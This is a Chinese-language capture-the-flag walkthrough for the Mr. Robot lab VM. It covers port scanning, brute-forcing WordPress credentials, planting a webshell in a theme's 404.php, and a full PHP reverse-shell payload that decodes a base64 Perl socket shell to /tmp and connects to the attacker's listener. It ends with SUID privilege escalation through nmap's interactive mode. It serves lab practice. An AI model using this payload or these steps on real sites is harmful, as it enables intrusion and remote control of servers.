1、主机发现
2、端口扫描
nmap -sT -sV -O -A -p- 192.168.0.29
22 closed
80 open
443 open
3、访问80、443
80
443
没什么有用的东西
4、扫一波网站目录
发现两个重要的东西
/robots.txt /wp-login.php
分别访问
/robots.txt
有两个文件
/wp-login.php
可以确定CMS是wordpress
5、访问robots.txt中的两个文件
fsocity.dic
是一个字典文件
key-1-of-3.txt
这是第一个flag
6、burpsuite爆破用户名和密码
根据刚刚得到的字典,尝试爆破
先爆破用户名
username:Elliot
再爆破密码
password:ER28-0652
7、getshell
法一(蚁剑连接):
进入后台写入一句话木马
蚁剑连接
http://192.168.0.29/wp-content/themes/twentyfifteen/404.php
法二(反弹shell):
ip是kali的机子
<?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ''; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function cf($fname,$text){ if($fp=@fopen($fname,'w')) { @fputs($fp,@base64_decode($text)); @fclose($fp); } } $yourip = "192.168.0.13"; $yourport = '4444'; $usedb = array('perl'=>'perl','c'=>'c'); $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; cf('/tmp/.bc',$back_connect); $res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); ?>
kali起一个监听
nc -nvlp 4444
浏览器访问
http://192.168.0.29/wordpress/wp-content/themes/twentyfifteen/404.php
上线
8、提权
上线的用户权限不足
/home目录下有个robot用户
/home/robot 目录下有第二个flag和一个存放md5加密的密码的文件
key-2-of-3.txt
权限不足,看来得先切换到robot用户
password.raw-md5
md5解密后:abcdefghijklmnopqrstuvwxyz
切换到robot用户,并访问第二个flag
利用 SUID提权(其它提权没有试)
find / -perm -4000 -type f -exec ls -la {} 2> /dev/null \;
使用nmap提权
nmap --interactive nmap> !sh
找剩余的flag
find / -name "key*of*"